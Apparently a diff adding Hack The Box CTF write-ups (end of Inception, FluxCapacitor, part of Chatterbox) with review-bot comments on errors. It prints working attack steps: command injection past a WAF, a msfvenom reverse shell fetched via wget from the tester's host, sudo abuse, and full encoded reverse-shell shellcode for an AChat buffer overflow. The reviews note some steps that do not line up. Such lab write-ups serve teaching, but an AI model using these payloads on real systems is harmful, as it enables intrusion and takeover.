+ root@Inception:~# tftp 192.168.0.1
+ tftp> put /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys
+ Sent 397 bytes in 0.0 seconds
+ tftp> exit
+ ?Invalid command
+ tftp> quit
+
+
+Now that's done we need to get 192.168.0.1 to change our ssh public key with the correct permissions, we'll get this done by getting APT to execute our command as we planned earlier :
+
+
+
+ root@Inception:~# echo 'APT::Update::Pre-Invoke {"chmod 600 /root/.ssh/authorized_keys"};' > 00command
+ root@Inception:~# tftp 192.168.0.1
+ tftp> put 00command /etc/apt/apt.conf.d/00command
+ Sent 67 bytes in 0.0 seconds
+ tftp> quit
+
+
+
+once that's done we wait 5 minutes and then ssh in as the root user :
+
+
+ root@Inception:~# ssh root@192.168.0.1
+ Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-101-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 0 packages can be updated.
+ 0 updates are security updates.
+
+
+ Last login: Thu Nov 30 20:04:21 2017
+ root@Inception:~# cat /root/root.txt
+ 8dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
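Review bot: `echo 'ProxyCommand corkscrew 10.10.10.67 3128 %h %p' >> /etc/ssh/ssh_config` appends an unconditional ProxyCommand to the system-wide client config, so every later `ssh` from the attacking machine, not only the one to 127.0.0.1, is tunnelled through the squid proxy on 10.10.10.67:3128 and breaks as soon as that box is gone; scope it to a `Host 127.0.0.1` stanza in ~/.ssh/config or pass it once with `ssh -o ProxyCommand='corkscrew 10.10.10.67 3128 %h %p' cobb@127.0.0.1`. The same login hides a step: the text says "we can't connect to ssh on the box yet" right after finding root:VwPddNh7xMZyDQoByQL4 in wp-config.php, then types a password at `cobb@127.0.0.1's password:` without saying which one; say which of the two passwords collected so far (babygurl69 or the MySQL one) was tried as cobb's SSH password. In the root part, "Didn't work, that's because we need to use tftp instead of ftp" explains nothing: `nc -zv 192.168.0.1 1-65535` is a TCP-only scan, so a tftp service on UDP/69 never appears anywhere in the enumeration, and the anonymous FTP `put` fails with `550 Permission denied` because anonymous upload is refused, not because the wrong protocol was picked; add how tftp was found and why its write into /root/.ssh is accepted, and say why the key still needs `chmod 600` (the Pre-Invoke trick) before sshd will use it. Smaller points: the `ls` shown under `/var/www/html/wordpress_4.8.3` lists `phpbash.php` and `webdav.passwd`, which is the webdav_test_inception listing pasted twice; "we are able to run /bin/bash as sudo" understates `(ALL : ALL) ALL`, which is any command as any user; hash-identifier reports MD5(APR), the Apache apr1 variant that hashcat mode 1600 cracks, not plain MD5; and the `<****VirtualHost` / `<****Location` tokens in the apache config are extraction residue for `<VirtualHost` and `<Location`.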
diff --git a/Medium/17.md b/Medium/17.md
new file mode 100644
index 0000000..b1ddb5d
--- /dev/null
+++ b/Medium/17.md
@@ -0,0 +1,287 @@
+# FluxCapacitor Writeup
+
+
+
+## Introduction :
+
+FluxCapacitor is a Medium linux box released back in December 2017
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → nmap -F --top-ports 10000 10.10.10.69 -vvv
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-09 05:59 GMT
+ Initiating Ping Scan at 05:59
+ Scanning 10.10.10.69 [2 ports]
+ Completed Ping Scan at 05:59, 0.33s elapsed (1 total hosts)
+ Initiating Parallel DNS resolution of 1 host. at 05:59
+ Completed Parallel DNS resolution of 1 host. at 05:59, 0.08s elapsed
+ DNS resolution of 1 IPs took 0.09s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
+ Initiating Connect Scan at 05:59
+ Scanning 10.10.10.69 [8320 ports]
+ Discovered open port 80/tcp on 10.10.10.69
+ Increasing send delay for 10.10.10.69 from 0 to 5 due to 70 out of 231 dropped probes since last increase.
+ Increasing send delay for 10.10.10.69 from 5 to 10 due to max_successful_tryno increase to 4
+ Connect Scan Timing: About 25.10% done; ETC: 06:01 (0:01:32 remaining)
+ Connect Scan Timing: About 55.44% done; ETC: 06:01 (0:00:49 remaining)
+ Completed Connect Scan at 06:01, 107.71s elapsed (8320 total ports)
+ Nmap scan report for 10.10.10.69
+ Host is up, received syn-ack (0.12s latency).
+ Scanned at 2020-03-09 05:59:15 GMT for 108s
+ Not shown: 8318 closed ports
+ Reason: 8318 conn-refused
+ PORT STATE SERVICE REASON
+ 80/tcp open http syn-ack
+ 5355/tcp filtered llmnr no-response
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -sCV -p80,5355 10.10.10.69
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-09 06:01 GMT
+ Nmap scan report for 10.10.10.69
+ Host is up (0.26s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http SuperWAF
+ |_http-server-header: SuperWAF
+ |_http-title: Keep Alive
+ 5355/tcp filtered llmnr
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 34.10 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's dirsearch it :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → dirsearch -u http://10.10.10.69/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -e txt,php,html,xml
+
+ git clone https://github.com/maurosoria/dirsearch.git
+ dirsearch -u -e -t 50 -x 500
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: txt, php, html, xml | HTTP method: get | Threads: 50 | Wordlist size: 220521
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-03-09_06-05-49.log
+
+ Target: http://10.10.10.69/
+
+ [06:05:50] Starting:
+ [06:05:51] 200 - 395B - /
+ [06:07:02] 403 - 577B - /sync
+ [06:09:49] 403 - 577B - /synctoy
+ [06:10:26] 403 - 577B - /synching
+ [06:10:34] 403 - 577B - /sync_scan
+ [06:11:12] 403 - 577B - /syncbackse
+ [06:14:01] 403 - 577B - /synch
+
+
+
+` 
+
+Looks like a very simple webpage, but when we look at it's sourcecode we are hinted towards a /sync directory. (which our dirsearch command found aswell)
+
+ 
+
+looks like we get a 403 forbidden error although we now know about a service running on the box and it's version. Hopefully for us it is vulnerable to RCE by abusing the user-agent and the opt parameter, but we need to escape some characters :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → curl "http://10.10.10.69/sync?opt=' /usr/bin/which mknod'"
+ 403
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → curl "http://10.10.10.69/sync?opt=' /usr/bin/whi[c]h mknod'"
+ 403
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → curl "http://10.10.10.69/sync?opt=' /usr/bin/whi[c]h mk\nod'"
+ /bin/mknod
+ bash: -c: option requires an argument
+
+
+
+Now that we verified we could get RCE on the machine, let's get into the important parts :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → curl "http://10.10.10.69/sync?opt=' c\at /usr/local/ope\nresty/nginx/conf/nginx.conf'" > nginx.conf
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 3896 0 3896 0 0 9938 0 --:--:-- --:--:-- --:--:-- 9938
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → curl "http://10.10.10.69/sync?opt=' c\at /usr/local/ope\nresty/nginx/conf/unixcmd.txt'" > unixcmd.txt
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 10822 0 10822 0 0 25167 0 --:--:-- --:--:-- --:--:-- 25109
+
+
+
+Now that we have the nginx config and the unixcmd textfiles we can enumerate the box further looking into nginx.conf :
+
+
+ SecRuleEngine On
+ SecRule ARGS "@rx [;\(\)\|\`\<\>\&\$\*]" "id:2,phase:2,t:trim,t:urlDecode,block"
+ SecRule ARGS "@rx (user\.txt|root\.txt)" "id:3,phase:2,t:trim,t:urlDecode,block"
+ SecRule ARGS "@rx (\/.+\s+.*\/)" "id:4,phase:2,t:trim,t:urlDecode,block"
+ SecRule ARGS "@rx (\.\.)" "id:5,phase:2,t:trim,t:urlDecode,block"
+ SecRule ARGS "@rx (\?s)" "id:6,phase:2,t:trim,t:urlDecode,block"
+
+ SecRule ARGS:opt "@pmFromFile /usr/local/openresty/nginx/conf/unixcmd.txt" "id:99,phase:2,t:trim,t:urlDecode,block"
+ content_by_lua_block {
+ local opt = 'date'
+ if ngx.var.arg_opt then
+ opt = ngx.var.arg_opt
+ end
+
+ -- ngx.say("DEBUG: CMD='/home/themiddle/checksync "..opt.."'; bash -c $CMD 2>&1")
+
+ local handle = io.popen("CMD='/home/themiddle/checksync "..opt.."'; bash -c ${CMD} 2>&1")
+ local result = handle:read("*a")
+ handle:close()
+ ngx.say(result)
+
+
+
+those were the filtering rules and the command execution part, which reveals us the username "themiddle". Now to get access on the box we'll get inside by getting a reverse Xterm shell, However we need to make sure that our xserver is listening to tcp :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → cat /etc/X11/xinit/xserverrc
+ #!/bin/sh
+
+ exec /usr/bin/X -nolisten tcp "$@"
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → sudo nano /etc/X11/xinit/xserverrc
+ [sudo] password for nihilist:
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → cat /etc/X11/xinit/xserverrc
+ #!/bin/sh
+
+ exec /usr/bin/X -listen tcp "$@"
+
+
+From there, we connect:
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.11 LPORT=9001 -f elf index.html
+ [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
+ [-] No arch selected, selecting arch: x86 from the payload
+ No encoder or badchars specified, outputting raw payload
+ Payload size: 68 bytes
+ Final size of elf file: 152 bytes
+ ELFT44 ��1���SCSj��f̀�Y�?̀Iy�h
+
+
+ h#)��fPQS���̀Rhn/shh//bi��RS��
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → curl "http://10.10.10.69/sync?opt=' w\get 10.10.14.11 -P /tmp'"
+
+
+` _Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → sudo python -m SimpleHTTPServer 80
+ Serving HTTP on 0.0.0.0 port 80 ...
+
+
+` _Terminal 1:_
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → curl "http://10.10.10.69/sync?opt=' c\hmod +x /tmp/index.md'"
+
+
+
+` _Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → sudo nc -lvnp 9001
+ listening on [any] 9001 ...
+
+
+` _Terminal 1:_
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → curl "http://10.10.10.69/sync?opt=' /tmp/index.md'"
+
+
+And we get a reverse shell ! However there is another way to get the user flag, which is by abusing the opt parameter on the sync page using curl :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → curl "10.10.10.69/sync?opt=' c''at /home/FluxCapacitorIn''c/us''er.txt'"
+ b8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we have the user flag !
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc we run the usual sudo -l
+
+
+ $ curl "http://10.10.10.69/sync?opt=' sudo -l'"
+
+ Matching Defaults entries for nobody on fluxcapacitor:
+ env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User nobody may run the following commands on fluxcapacitor:
+ (ALL) ALL
+ (root) NOPASSWD: /home/themiddle/.monit
+
+
+we are hinted towards /home/themiddle/.monit so we print it out :
+
+
+ cat .monit
+
+ #!/bin/bash
+
+ if [ "$1" == "cmd" ]; then
+ echo "Trying to execute ${2}"
+ CMD=$(echo -n ${2} | base64 -d)
+ bash -c "$CMD"
+ fi
+
+
+And here we see that all we need to do is passing 2 arguements : the first one being "cmd" and the second one being a base64 encoded command. so we can run it, but for this example we'll show how it can be done remotely without even having access on the system by using curl just like for the user flag :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → curl "10.10.10.69/sync?opt=' su''do /home/themiddle/.monit cmd $(echo cat /root/root.txt | base64)'"
+ Trying to execute Y2F0IC9yb290L3Jvb3QudHh0Cg==
+ bdXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+ bash: -c: option requires an argument
+
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
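Review bot: Part 2's steps do not line up with each other. The `xserverrc` change to `exec /usr/bin/X -listen tcp "$@"` is never used by anything that follows (the shell is caught with `sudo nc -lvnp 9001`, not an xterm), and it leaves the tester's own X server reachable over TCP, so either drop that block or tell the reader to revert it afterwards. The `msfvenom -p linux/x86/shell_reverse_tcp ... -f elf index.html` line has no `-o`, which is why raw ELF bytes are dumped into the terminal right after it; the `wget 10.10.14.11 -P /tmp` step fetches whatever the web root serves as index.html, yet the next two steps run `chmod +x /tmp/index.md` and `/tmp/index.md`, a name that never appears before that point. Name the output file once with `-o` and use that same name throughout. Smaller points: the `_Terminal N:_` labels from the second one onward are preceded by a stray backtick and the "progress graph" paragraph at the end is empty, both look like image embeds lost in conversion; "reveals us the username" should read "reveals the username", "arguements" should be "arguments", and the `bash: -c: option requires an argument` line after the root flag is left unexplained (the `Cg==` tail of the encoded command shows that `echo` contributed a trailing newline).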
diff --git a/Medium/18.md b/Medium/18.md
new file mode 100644
index 0000000..628017a
--- /dev/null
+++ b/Medium/18.md
@@ -0,0 +1,561 @@
+# Chatterbox Writeup
+
+
+
+## Introduction :
+
+Chatterbox is a Medium windows box released back in January 2018
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → nmap -F 10.10.10.74
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-11 08:11 GMT
+ Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
+ Nmap done: 1 IP address (0 hosts up) scanned in 3.08 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → nmap -F 10.10.10.74 -Pn
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-11 08:12 GMT
+ Nmap scan report for 10.10.10.74
+ Host is up.
+ All 100 scanned ports on 10.10.10.74 are filtered
+
+ Nmap done: 1 IP address (1 host up) scanned in 21.16 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → nmap -F 10.10.10.74 --top-ports=30000 -vvv
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-11 08:12 GMT
+ Initiating Ping Scan at 08:12
+ Scanning 10.10.10.74 [2 ports]
+ Completed Ping Scan at 08:13, 3.00s elapsed (1 total hosts)
+ Nmap scan report for 10.10.10.74 [host down, received no-response]
+ Read data files from: /usr/bin/../share/nmap
+ Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
+ Nmap done: 1 IP address (0 hosts up) scanned in 3.07 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → nmap -F 10.10.10.74 --top-ports 30000 -vvv -Pn
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-11 08:13 GMT
+ Initiating Parallel DNS resolution of 1 host. at 08:13
+ Completed Parallel DNS resolution of 1 host. at 08:13, 0.01s elapsed
+ DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
+ Initiating Connect Scan at 08:13
+ Scanning 10.10.10.74 [8320 ports]
+ Connect Scan Timing: About 1.86% done; ETC: 08:40 (0:27:13 remaining)
+ Connect Scan Timing: About 6.91% done; ETC: 08:40 (0:25:49 remaining)
+ Connect Scan Timing: About 11.96% done; ETC: 08:40 (0:24:25 remaining)
+ Connect Scan Timing: About 17.01% done; ETC: 08:40 (0:23:01 remaining)
+ Discovered open port 9255/tcp on 10.10.10.74
+ Connect Scan Timing: About 39.73% done; ETC: 08:26 (0:07:55 remaining)
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → nmap -sCV -p9255 10.10.10.74 -Pn
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-11 08:18 GMT
+ Nmap scan report for 10.10.10.74
+ Host is up (0.099s latency).
+
+ PORT STATE SERVICE VERSION
+ 9255/tcp open http AChat chat system httpd
+ |_http-server-header: AChat
+ |_http-title: Site doesn't have a title.
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.00 seconds
+
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scans picked up port 9255 running the http service so let's investigate it :
+
+
+
+going to /achat we seem to get a binary file so let's download it locally and see what it says :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → file achat
+ achat: empty
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → r2 achat
+ [0x00000000]> aaa
+ [x] Analyze all flags starting with sym. and entry0 (aa)
+ [x] Analyze function calls (aac)
+ [x] find and analyze function preludes (aap)
+ [x] Analyze len bytes of instructions for references (aar)
+ [x] Check for objc references
+ [x] Check for vtables
+ [x] Type matching analysis for all functions (aaft)
+ [x] Propagate noreturn information
+ [x] Use -AA or aaaa to perform additional experimental analysis.
+ [0x00000000]> afl
+ [0x00000000]> vvv
+
+
+Seems like we have an empty application file, but let's see if radare2 shows us anything
+
+
+
+As expected we didn't get much from that. Let's run a quick searchsploit cmd with the "Achat" arguement:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → searchsploit Achat
+ ------------------------------------------------------- -------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ------------------------------------------------------- -------------------------------
+ Achat 0.150 beta7 - Remote Buffer Overflow | exploits/windows/remote/36025.py
+ Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit)| exploits/windows/remote/36056.rb
+ MataChat - 'input.php' Multiple Cross-Site Scripting Vu| exploits/php/webapps/32958.txt
+ Parachat 5.5 - Directory Traversal | exploits/php/webapps/24647.txt
+ ------------------------------------------------------- -------------------------------
+ Shellcodes: No Result
+
+
+Seems like we have a few interesting scripts to try, so let's pick up the first one :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → locate 36025.py
+ /usr/share/exploitdb/exploits/windows/remote/36025.py
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → cp /usr/share/exploitdb/exploits/windows/remote/36025.py .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → nano 36025.py
+
+
+` 
+
+once we adapted the python script correctly we grep out the msfvenom command to edit it accordingly :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → grep msfvenom 36025.py
+ # msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
+
+
+So we edit it accordingly to generate the payload we need :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp_allports LPORT=4444 LHOST=10.10.14.11 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
+
+
+Here we can see that we will generate a payload that will connect back to our ip (10.10.14.11) on port 9001 spawning the calc.exe application in the process. Note also that BufferRegister=EAX indicates at which register the jump call will be, the EAX register will contain the jump call that basically points at the BEGINNING of our buffer overflow payload.
+
+
+ Found 1 compatible encoders
+ Attempting to encode payload with 1 iterations of x86/unicode_mixed
+ x86/unicode_mixed succeeded with size 690 (iteration=0)
+ x86/unicode_mixed chosen with final size 690
+ Payload size: 690 bytes
+ Final size of python file: 3365 bytes
+ buf = b""
+ buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
+ buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
+ buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
+ buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
+ buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
+ buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
+ buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
+ buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
+ buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
+ buf += b"\x47\x42\x39\x75\x34\x4a\x42\x49\x6c\x38\x68\x35\x32"
+ buf += b"\x59\x70\x4b\x50\x6d\x30\x53\x30\x63\x59\x47\x75\x4c"
+ buf += b"\x71\x49\x30\x63\x34\x62\x6b\x6e\x70\x4e\x50\x64\x4b"
+ buf += b"\x70\x52\x7a\x6c\x34\x4b\x42\x32\x4e\x34\x72\x6b\x62"
+ buf += b"\x52\x4f\x38\x4c\x4f\x55\x67\x6d\x7a\x4d\x56\x70\x31"
+ buf += b"\x49\x6f\x66\x4c\x4f\x4c\x30\x61\x51\x6c\x49\x72\x4e"
+ buf += b"\x4c\x6b\x70\x55\x71\x56\x6f\x6c\x4d\x4d\x31\x45\x77"
+ buf += b"\x67\x72\x38\x72\x51\x42\x70\x57\x44\x4b\x31\x42\x5a"
+ buf += b"\x70\x54\x4b\x50\x4a\x6d\x6c\x34\x4b\x6e\x6c\x5a\x71"
+ buf += b"\x51\x68\x77\x73\x4e\x68\x79\x71\x46\x71\x62\x31\x44"
+ buf += b"\x4b\x31\x49\x4f\x30\x6d\x31\x57\x63\x52\x6b\x71\x39"
+ buf += b"\x6e\x38\x6a\x43\x6f\x4a\x6d\x79\x44\x4b\x70\x34\x54"
+ buf += b"\x4b\x5a\x61\x57\x66\x4e\x51\x4b\x4f\x36\x4c\x69\x31"
+ buf += b"\x78\x4f\x5a\x6d\x39\x71\x68\x47\x4c\x78\x57\x70\x74"
+ buf += b"\x35\x58\x76\x49\x73\x33\x4d\x49\x68\x6f\x4b\x51\x6d"
+ buf += b"\x6f\x34\x33\x45\x48\x64\x42\x38\x54\x4b\x70\x58\x6f"
+ buf += b"\x34\x6d\x31\x48\x53\x72\x46\x64\x4b\x4a\x6c\x4e\x6b"
+ buf += b"\x62\x6b\x71\x48\x6d\x4c\x4b\x51\x57\x63\x52\x6b\x69"
+ buf += b"\x74\x52\x6b\x39\x71\x36\x70\x64\x49\x71\x34\x4f\x34"
+ buf += b"\x6b\x74\x51\x4b\x31\x4b\x33\x31\x6e\x79\x4f\x6a\x52"
+ buf += b"\x31\x69\x6f\x67\x70\x61\x4f\x4f\x6f\x6e\x7a\x54\x4b"
+ buf += b"\x4d\x42\x78\x6b\x64\x4d\x51\x4d\x62\x48\x6f\x43\x6d"
+ buf += b"\x62\x39\x70\x6b\x50\x32\x48\x31\x67\x73\x43\x4d\x62"
+ buf += b"\x31\x4f\x51\x44\x4f\x78\x4e\x6c\x30\x77\x4d\x56\x49"
+ buf += b"\x77\x39\x6f\x78\x55\x37\x48\x66\x30\x5a\x61\x49\x70"
+ buf += b"\x69\x70\x4f\x39\x45\x74\x4e\x74\x50\x50\x61\x58\x6b"
+ buf += b"\x79\x53\x50\x50\x6b\x4d\x30\x69\x6f\x66\x75\x62\x30"
+ buf += b"\x42\x30\x72\x30\x52\x30\x6f\x50\x70\x50\x61\x30\x6e"
+ buf += b"\x70\x72\x48\x79\x5a\x4a\x6f\x77\x6f\x57\x70\x49\x6f"
+ buf += b"\x68\x55\x63\x67\x53\x38\x39\x7a\x6c\x4a\x6c\x4e\x4a"
+ buf += b"\x6b\x32\x48\x4d\x32\x59\x70\x7a\x71\x51\x4c\x35\x39"
+ buf += b"\x38\x66\x30\x6a\x4c\x50\x42\x36\x71\x47\x73\x38\x42"
+ buf += b"\x79\x43\x75\x72\x54\x31\x51\x4b\x4f\x49\x45\x33\x55"
+ buf += b"\x65\x70\x62\x54\x7a\x6f\x51\x56\x64\x4b\x51\x36\x4c"
+ buf += b"\x42\x31\x76\x59\x50\x6f\x50\x45\x36\x67\x70\x50\x66"
+ buf += b"\x34\x49\x71\x36\x4d\x32\x68\x6b\x5a\x42\x61\x5a\x79"
+ buf += b"\x70\x32\x4a\x69\x74\x62\x36\x6e\x77\x33\x38\x59\x72"
+ buf += b"\x49\x49\x66\x68\x61\x4f\x59\x6f\x48\x55\x64\x4b\x50"
+ buf += b"\x36\x72\x4a\x6d\x70\x53\x38\x69\x70\x4c\x50\x4b\x50"
+ buf += b"\x59\x70\x6e\x76\x61\x5a\x4b\x50\x62\x48\x50\x58\x63"
+ buf += b"\x74\x6e\x73\x38\x65\x4b\x4f\x59\x45\x76\x33\x50\x53"
+ buf += b"\x30\x6a\x6b\x50\x71\x46\x30\x53\x50\x57\x53\x38\x59"
+ buf += b"\x72\x77\x69\x47\x58\x31\x4f\x69\x6f\x76\x75\x4b\x51"
+ buf += b"\x59\x33\x4b\x79\x77\x56\x74\x35\x58\x6e\x37\x53\x41"
+ buf += b"\x41"
+
+
+From there we edit the python script accordingly by pasting in the payload shellcode we generated:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → nano 36025.py
+
+
+` 
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → nano 36025.py
+
+
+Once we're done, we set up a meterpreter handler listening on our port 4444 :
+
+
+ msf5 > use exploit/multi/handler
+ msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp_allports
+ payload => windows/shell/reverse_tcp_allports
+ msf5 exploit(multi/handler) > set lhost 10.10.14.11
+ lhost => 10.10.14.11
+ msf5 exploit(multi/handler) > set lport 4444
+ lport => 4444
+ msf5 exploit(multi/handler) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.11:4444
+
+
+Launch the exploit and catch the incoming reverse shell connection :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → python 36025.py
+ ---->{P00F}!
+
+
+
+ msf5 exploit(multi/handler) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.11:4444
+ [*] Encoded stage with x86/shikata_ga_nai
+ [*] Sending encoded stage (267 bytes) to 10.10.10.74
+ [*] Command shell session 1 opened (10.10.14.11:4444 -> 10.10.10.74:49157) at 2020-03-12 09:51:54 +0000
+
+ Microsoft Windows [Version 6.1.7601]
